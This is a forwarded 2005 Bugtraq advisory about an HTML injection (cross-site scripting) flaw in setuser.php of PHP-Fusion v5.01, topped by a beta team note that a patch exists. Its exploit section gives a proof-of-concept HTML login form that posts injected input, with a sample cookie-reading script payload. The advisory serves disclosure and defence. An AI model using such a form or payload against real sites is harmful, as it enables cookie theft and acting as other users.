Fw: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
A patch has now been made available at php-fusion.co.uk
-Sheldon King
PHP Fusion Beta Team
----- Original Message -----
From: "PersianHacker Team" <pi3ch@xxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Saturday, March 19, 2005 3:20 AM
Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection
Vulnerability
[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
Date: 2005 March
Bug Number: 10
PHP-Fusion
a light-weight open-source content management system (CMS) written in PHP.
It utilises a mySQL database to store your site content and includes a
simple, comprehensive adminstration system. PHP-Fusion includes the most
common features you would expect to see in many other CMS packages
More info @:
http://php-fusion.co.uk/
Discussion:
--------------------
The software does not properly validate user-supplied input in
'setuser.php'.
A remote user can access the target user's cookies (including authentication
cookies),
if any, associated with the site running the PHP-Fusion software, access
data
recently submitted by the target user via web form to the site, or take
actions
on the site acting as the target user.
Exploit:
--------------------
<html>
<head>
<title>PHP-Fusion v5.01 Exploit</title>
</head>
<body>
<h1>PHP-Fusion v5.01 Html Injection Exploit</h1>
<form method="POST" action="http://www.example.com/setuser.php">
<b>XSS in register.php:</b><p>
Username:
<input type="text" name="user_name" size="48" value="XSS Injection
Code"></p>
<p>
Password:
<input type="text" name="user_pass" size="48" value="XSS Injection
Code"></p>
<p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
exmple: <script>document.write(document.cookie)</script></p>
<p> <input type='submit' name='login' value='RUN!'
class='button'></p>
</form>
<p> </p>
<p align="center"><a
href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>
Solution:
--------------------
No solution was available at the time of this entry.
Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET
Special Thanks: devil_box(for xss article), amectris, herbod.
Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net